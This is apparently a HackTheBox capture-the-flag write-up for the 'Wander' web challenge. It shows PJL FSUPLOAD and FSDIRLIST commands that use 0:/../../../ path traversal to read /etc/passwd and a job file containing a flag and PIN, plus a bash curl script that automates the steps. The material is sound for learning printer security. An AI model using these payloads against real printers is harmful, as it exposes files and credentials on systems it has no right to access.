webfreemedium

Wander

hackthebox

Task: Exploit a web-based printer management interface to read the flag from the server filesystem. Solution: Use PJL (Printer Job Language) FSUPLOAD command with path traversal (0:/../../../) to escape the virtual filesystem and read /home/default/readyjob containing the flag.

$ ls tags/ techniques/
lfipath_traversalpjlprinter
path_traversalpjl_exploitationfilesystem_enumeration

Wander - HackTheBox

Description

My uncle isn't allowing me to print documents. He's off to vacation and I need a PIN to unlock this printer. All I found is a web server where this printer is managed from.

Target: http://94.237.120.74:48334

Analysis

Reconnaissance

  1. Web server running Werkzeug/2.0.1 Python/3.7.11 (Flask)
  2. Main dashboard at / shows "Wander Dashboard" with "HTB Printer"
  3. Found /jobs page with a form to send PJL (Printer Job Language) commands
  4. Form placeholder shows @PJL INFO ID

Vulnerability Discovery

The web application accepts PJL commands and forwards them to a printer emulator. This is a classic printer exploitation scenario where PJL filesystem commands can be abused.

Key PJL commands that worked:

  • @PJL INFO ID - Returns "HTB Printer"
  • @PJL INFO STATUS - Returns printer status (CODE=10001, DISPLAY="Ready", ONLINE=True)
  • @PJL FSDIRLIST NAME="0:/" ENTRY=1 - Lists printer filesystem directories

Path Traversal in FSUPLOAD

The @PJL FSUPLOAD command is vulnerable to path traversal. The printer uses a virtual filesystem starting at 0:/, but we can escape it using ../:

@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000

This allowed reading arbitrary files from the server filesystem.

Solution

Step 1: Enumerate Printer Filesystem

First, list the printer's virtual filesystem:

@PJL FSDIRLIST NAME="0:/" ENTRY=1

Step 2: Confirm Path Traversal

Test path traversal by reading /etc/passwd:

@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000

Step 3: Enumerate Root Filesystem

Use FSDIRLIST with path traversal to enumerate directories:

@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1

Found directories: etc, conf, home, rw, tmp, csr_misc, printer

Step 4: Explore Home Directory

@PJL FSDIRLIST NAME="0:/../../../home/" ENTRY=1
@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1

Found a file called readyjob in /home/default/.

Step 5: Read the Flag

@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000

The file contained a PJL job with embedded credentials:

@PJL COMMENT FLAG = "HTB{w4lk_4nd_w0nd3r}" 
@PJL SET USERNAME="default"
@PJL SET HOLDKEY="8214"

Exploit Script

#!/bin/bash
# Wander - HTB Web Challenge Exploit
TARGET="http://94.237.120.74:48334"

# Function to send PJL command
send_pjl() {
    local cmd="$1"
    curl -s "$TARGET/jobs" \
        --data-urlencode "cmd=$cmd" \
        -X POST
}

# Step 1: Verify printer
echo "[*] Checking printer ID..."
send_pjl '@PJL INFO ID'

# Step 2: List root filesystem via path traversal
echo "[*] Enumerating filesystem..."
send_pjl '@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1'

# Step 3: List home directory
echo "[*] Checking /home/default/..."
send_pjl '@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1'

# Step 4: Read the flag file
echo "[*] Reading flag..."
send_pjl '@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000'

Key Findings

ItemValue
FlagHTB{w4lk_4nd_w0nd3r}
Printer PIN (HOLDKEY)8214
Usernamedefault

Key Indicators

Use this technique when you see:

  • Web interface for printer management
  • PJL command input fields
  • Printer Job Language references
  • Virtual filesystem paths like 0:/
  • FSUPLOAD, FSDIRLIST, or similar filesystem commands

PJL Command Reference

CommandDescription
@PJL INFO IDGet printer identification
@PJL INFO STATUSGet printer status
@PJL FSDIRLIST NAME="path" ENTRY=1List directory contents
@PJL FSUPLOAD NAME="path" OFFSET=0 SIZE=nRead file contents
@PJL FSDOWNLOADWrite file (if enabled)
@PJL FSMKDIRCreate directory
@PJL FSDELETEDelete file

Lessons Learned

  1. PJL Exploitation: Printer Job Language can be exploited for filesystem access on network printers
  2. Virtual Filesystem Escape: HP printers use a virtual filesystem (0:/) that can be escaped with path traversal
  3. Sensitive Data in Print Jobs: Printer job files may contain sensitive information like PINs and credentials
  4. Path Traversal: Always check for path traversal in file-related operations, especially in embedded systems

References

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md

$ grep --similar

Similar writeups